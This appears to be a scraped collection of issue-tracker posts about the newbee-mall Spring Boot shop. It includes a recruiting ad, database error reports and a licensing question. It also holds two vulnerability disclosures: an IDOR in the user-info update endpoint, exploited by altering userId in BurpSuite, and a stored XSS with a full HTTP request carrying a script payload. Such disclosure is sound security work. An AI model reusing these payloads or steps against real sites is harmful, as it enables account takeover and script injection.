newbee-mall 项目（新蜂商城）是一套电商系统，包括 newbee-mall 商城系统及 newbee-mall-admin 商城后台管理系统，基于 Spring Boot 2.X 及相关技术栈开发。 前台商城系统包含首页门户、商品分类、新品上线、首页轮播、商品推荐、商品搜索、商品展示、购物车、订单结算、订单流程、个人订单管理、会员中心、帮助中心等模块。 后台管理系统包含数据面板、轮播图管理、商品管理、订单管理、会员管理、分类管理、设置等模块。

阿里直招，社招校招均有，BU囊括电商零售系统全链路，前端至交易、详情页，后端至仓储、履约，更有海外复杂场景等你实践，有意请邮件简历至 liuzhu.wlz#alibaba-inc.com 校招的潜力股，勇敢发来简历吧，会邀请进校招小群，定期分享写简历的技巧，更有优先面试的机会

公司/团队介绍 我们是阿里巴巴集团新零售技术旗下供应链技术国际化团队，我们致力于通过世界一流的全球化技术服务来自全球10亿+的海外消费者，为全球消费者带去极致的购物体验，让买全球卖全球的使命落地成为普惠全球的显示图景。我们服务的业务实体有 lazada、AliExpress、天猫海外、Daraz、Trendyol等平台。

联系方式 邮箱： liuzhu.wlz#alibaba-inc.com

错误信息：nested exception is org.apache.ibatis.exceptions.PersistenceException: ### Error querying database. Cause: org.springframework.jdbc.CannotGetJdbcConnectionException: Failed to obtain JDBC Connection; nested exception is java.sql.SQLNonTransientConnectionException: Could not create connection to database server. Attempted reconnect 3 times. Giving up. ### The error may exist in file [E:\网络下载\newbee-mall-master\target\classes\mapper\GoodsCategoryMapper.xml] ### The error may involve ltd.newbee.mall.dao.GoodsCategoryMapper.selectByLevelAndParentIdsAndNumber ### The error occurred while executing a query ### Cause: org.springframework.jdbc.CannotGetJdbcConnectionException: Failed to obtain JDBC Connection; nested exception is java.sql.SQLNonTransientConnectionException: Could not create connection to database server. Attempted reconnect 3 times. Giving up.

如何看待开源软件的知识产权问题 这样后续任何使用该项目的人都可以清晰的了解到使用范围，而不是使用 GPL 协议加软件著作权，还得仔细看看他俩的内容。 举个例子：如果我使用该软件并且修改了还售卖服务，我只要开源就好了（根据 GPL），不需要获得原作者的授权。那对于软件著作权来说我需要获得原作者的授权么？没有仔细了解，不清楚。

您好，我们对您的项目源码进行分析，发现在用户信息更新模块内存在的横向越权的情况，可以通过修改请求中的userId使得不需要密码验证的情况下直接登陆别的用户。

相关版本：

1f2c2dfy 提交版本（10月28日）

横向越权行为源码位置：

ltd.newbee.mall.controller.mall.PersonalController下的updateInfo函数

ltd.newbee.mall.service.impl.NewBeeMallUserServiceImpl下的updateUserInfo函数

由于mallUser.getUserId是用户可控的，并且逻辑上缺少校验机制，因此在红色方框标记的地方存在横向越权的行为，可以通过修改用户的Id获取直接使用别的用户登陆。

横向越权漏洞复现：

使用工具为BurpSuite

1. 登陆账户：测试用户3，该用户的订单为空：

2. 修改个人信息并提交：

3. 使用BurpSuite拦截该请求并篡改userId后发送该请求：

4. 现在用户：十三，不需要用户登陆验证，直接可以冒用别的用户身份和修改相关信息和订单：

[Suggested description] There is a cross site scripting vulnerability in the commodity information modification module in the main version of NewBee mall. The vulnerability stems from the fact that the form submission module that modifies the commodity information does not restrict or escape the sensitive characters entered, causing the execution of malicious JS code to trigger JS pop-up.

[Vulnerability Type] Cross site scripting vulnerability

[Vendor of Product] https://github.com/newbee-ltd/newbee-mall

[Affected Product Code Base] v1.0.0

[Affected Component]

POST /admin/goods/update HTTP/1.1
Host: localhost:28089
Content-Length: 392
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/json
Origin: http://localhost:28089
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=5B28A8C926D035BCC4A809131899B51D
Connection: close

{"goodsId":"10907","goodsName":"鐖辩柉<script>alert(\"xss\")</script>","goodsIntro":"xxx","goodsCategoryId":"47","tag":"鐖辩柉","originalPrice":"1","sellingPrice":"1","stockNum":"0","goodsDetailContent":"<p>hhh</p><p><br/></p>","goodsCoverImg":"http://localhost:28089/upload/20220303_10153124.html","goodsCarousel":"http://localhost:28089/upload/20220303_10153124.html","goodsSellStatus":"0"}

[Impact Code execution] true

[Vulnerability proof] 1.Access address http://localhost:28089/admin/goods , select the commodity information to be modified and enter information editing.

2.Enter in the input box and click Save to complete the form information submission.

3.The pop-up window is triggered when the page is refreshed, and the loophole reproduction is completed

我按“项目初体验：启动和使用新蜂商城”中所讲，将sql脚本导入新建的数据库中。用的连接工具是navicat for mysql。 工具报错：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0) NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', create_user i' at line 7。 是mysql版本问题吗？我版本是5.5.58

1、/personal/updateInfo，this interface can be used to update user information： 2、The corresponding code is as follows： Track updateUserInfo method： 3、The code updates the information after querying by the value of userid, so you can modify any user information by tampering with the value of userId.